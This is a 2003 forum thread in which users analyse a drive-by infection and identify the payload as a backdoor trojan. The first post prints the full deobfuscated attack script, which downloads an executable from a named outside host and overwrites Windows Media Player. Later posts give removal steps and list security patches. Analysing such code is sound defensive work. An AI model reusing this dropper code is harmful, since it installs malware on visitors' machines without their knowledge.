Hacked help!

**DarkDelight.net** · Fri 3 Oct '03, 1:19am

If you un-obfuscate that code, it reads:

HTML Code:

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP"); 
    x.Open("GET", "http://www.lhconline.net/js/mmc.exe",0); 
    x.Send(); 
    
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {
        
            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }
    
    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")    
    }
    
    setTimeout("doit()", 5000);
    
    
</script>

**rylin** · Fri 3 Oct '03, 1:22am

Basically, it just replaced your windows media player executable with what's probably a trojan.

1) Uninstall windows media player from the control panel
2) Download it again

**DarkDelight.net** · Fri 3 Oct '03, 1:34am

That is not a nice thing to do.

OK, we know where the .exe is hosted, right?
Where is the page which contaied this code?

**Erwin** · Fri 3 Oct '03, 1:41am

Originally posted by DarkDelight.net

That is not a nice thing to do.

OK, we know where the .exe is hosted, right?
Where is the page which contaied this code?

No, not nice at all.

Btw, this thread is a good example of how in vB3 wide posts affect the whole thread, unlike in vB2.

**DarkDelight.net** · Fri 3 Oct '03, 1:46am

Originally posted by Erwin

No, not nice at all.

Btw, this thread is a good example of how in vB3 wide posts affect the whole thread, unlike in vB2.

Absolutely!

I hope this is fixed in the new style.

**rylin** · Fri 3 Oct '03, 1:57am

Which is why the oh-so-great Kier should put individual posts in their own table

(also, having the reply box left-aligned wouldn't hurt either

**DarkDelight.net** · Fri 3 Oct '03, 2:00am

[/offtopic]

This is a variant of the Backdoor.Beasty Trojan,
which gives the creator access to your machine.

I believe it affects Win95/95b/98/98SE/me/NT/2K/XP

**Brandon** · Fri 3 Oct '03, 11:58am

Originally posted by DarkDelight.net

[/offtopic]

This is a variant of the Backdoor.Beasty Trojan,
which gives the creator access to your machine.

I believe it affects Win95/95b/98/98SE/me/NT/2K/XP

Or in other words...ALL windows versions after 3.1

**DarkDelight.net** · Fri 3 Oct '03, 12:05pm

Originally posted by Brandon

Or in other words...ALL windows versions after 3.1

Not necessarily.

It depends exactly what variant we're dealing with here.

The original Backdoor.Beasty only affected Win9x

I do not believe than any variant can touch linux, OSX, etc.

**rylin** · Fri 3 Oct '03, 12:11pm

Originally posted by DarkDelight.net

Not necessarily.

It depends exactly what variant we're dealing with here.

The original Backdoor.Beasty only affected Win9x

I do not believe than any variant can touch linux, OSX, etc.

Since when is linux, OSX windows? :P

**DarkDelight.net** · Fri 3 Oct '03, 12:16pm

Originally posted by rylin

Since when is linux, OSX windows? :P

Since never, that's why they aren't affected.

**Mr. HillBilly** · Fri 3 Oct '03, 10:32pm

Security Update for Windows Media Player (KB828026)
Download size: 2.8 MB, < 1 minute
A security issue has been identified that could allow an attacker to execute commands on a computer running Windows Media Player.

October 2003, Cumulative Patch for Internet Explorer 6 Service Pack 1 (KB828750)
Download size: 2.1 MB, < 1 minute
Security issues identified in Microsoft Internet Explorer (IE) could allow an attacker to compromise systems with IE installed (even if IE is not used as the Web browser). For example, an attacker could run programs on a computer used to view the attacker's Web site.

**Skeptical** · Sat 4 Oct '03, 2:50am

Ah yes I was able to decode the obfuscated javascript code and eventually figured out it was the Backdoor-AMQ trojan. I am just surprised visiting a simple web page could do so much damage. I got no popup prompts. Nothing. And a windows update showed that everything was updated, but I guess not!

What got me even more angry is how it was able to shut down my AV and firewall. Aren't AV's and firewalls supposed to be able to handle this type of security breach? Even if it doesn't have the signature to detect the virus, it should at least prevent a third party program from shutting the AV/firewall down!

**Skeptical** · Sat 4 Oct '03, 2:57am

Now that everything is fixed, the only thing left to do is to have lhconline.net (which distributed the backdoor) shut down. That site is disguised as a legitimate site, but when you try to click on its links they all go nowhere. Also, the whois record looks like bogus to me. This leads me to think tha the entire site itself was created using fraud, for the sole purpose of distributing the trojan, and perhaps other things.

What do you guys think?

Hacked help!

Hacked help!

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment